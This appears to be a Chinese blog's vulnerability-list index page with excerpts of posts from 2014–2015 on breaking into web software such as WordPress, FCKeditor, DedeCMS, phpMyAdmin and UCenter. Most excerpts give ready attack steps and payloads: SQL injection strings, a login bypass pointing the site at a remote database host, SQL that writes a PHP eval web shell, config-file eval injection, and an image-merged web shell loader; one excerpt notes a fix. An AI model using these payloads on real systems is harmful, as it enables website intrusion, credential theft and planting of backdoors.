• 一、漏洞类型:网站可以爆绝对路径。下面列出一小部分漏洞文件: /wp-settings.php /wp-admin/admin-functions.php /wp-admin/menu-header.php /wp-admin/menu.php /wp-admin/options-head.php /wp-admin/upgrade-functions.php /wp-admin/includes/admin.php /wp-includes/admin-bar.php /wp-includes/author-template.php /wp-includes/category-template.php ...
    作者:熊猫| 发布:2015年1月11日| 阅读:2,365次| 分类:PHP, 代码审计, 漏洞列表, 编程语言| 标签:
  • 今天我在有fckeditor的网站上上传一个图片时,苦于找不到上传过的文件的地址,就发现了这个漏洞,不知道前面有没有谁发现。 首先找到网站fckeditor/editor/filemanager/connectors/test.html等上传文件,浏览器打开。 然后在最顶上看到Connector,选择网站脚本类型,在Current Folder里随便填入什么,然后选择上传一个图片,然后就可以看到上传结果中显示的警告内容,你就可...
    作者:熊猫| 发布:2014年12月24日| 阅读:4,694次| 分类:漏洞列表| 标签:
  • 方法一、 进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images/upload/Media/xx.php 方法二、 后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,...
    作者:熊猫| 发布:2014年2月26日| 阅读:5,461次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • 把以下代码中的:validate=dcug 改为当前的验证码,即可直接进入网站后台,此漏洞的前提是必须得到后台路径才能实现。 http://www.123.com/织梦网站后台/login.php?dopost=login &validate=dcug&userid=admin&pwd=inimda &_POST[GLOBALS][cfg_dbhost]=116.255.183.90 &_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0 &_POST[...
    作者:熊猫| 发布:2014年2月21日| 阅读:3,315次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • member/reg_new.php POST dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA &mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r &uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss &email=sss%40ss.ss&safequestion=0&safeanswer= &sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `dede...
    作者:熊猫| 发布:2014年2月21日| 阅读:2,623次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 首先用暴路径漏洞找到绝对路径,然后替换下面的路径 随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell) Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'D:\www\dmtz\bbs\upload\phpmyadmin\eval.php'; Drop TABLE IF EXISTS a; 这是我们的后门 http://xxx.com/ph...
    作者:熊猫| 发布:2014年2月21日| 阅读:3,615次| 分类:PHP, 漏洞列表, 编程语言| 标签:, ,
  • 首先你应该得到管理员的用户名和密码,若密码最好不过了,如果实在找不到找好去找一下老密。密码都得到了以后,进入后台,直接在UCenter IP 地址(站长--ucenter设置): 里面插入一句话  xxoo\\');eval($_POST[a])?>;// 就ok 然后菜刀连接http://www.xxoo.com/config/config_ucenter.php 密码a。 现在这个漏洞应该大部分的网站都不存在了。
    作者:熊猫| 发布:2014年2月21日| 阅读:2,848次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 上传地址:http://bbs.myoppo.com/bluesword/blue_sword.php?t=t_upload&Action=PostMsg 已使用解析拿下shell。 大马:<?fputs(fopen("x.php","w"),"<?eval(\$_POST[g]);?>")?> 只要把大马和一张图片合成后,上传,直接在后面加入1.php 自动生成x.php的木马。 修复方案: 1、设置php.ini的cgi.fix_pathinfo为0,重启php。最方便,但修改设置的影响需要自己评...
    作者:熊猫| 发布:2014年2月21日| 阅读:2,735次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • SQL注入是什么?   许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入。   网站的恶梦——SQL注入   SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中...
    作者:熊猫| 发布:2014年2月04日| 阅读:1,301次| 分类:漏洞列表| 标签:
  • 查询fckeditor编辑器版本 FCKeditor/_whatsnew.html fckeditor/editor/dialog/fck_about.html   FCKeditor 中test 文件的上传地址 FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanager/connectors/uploadtest.html ( ...
    作者:熊猫| 发布:2014年1月28日| 阅读:1,893次| 分类:漏洞列表| 标签: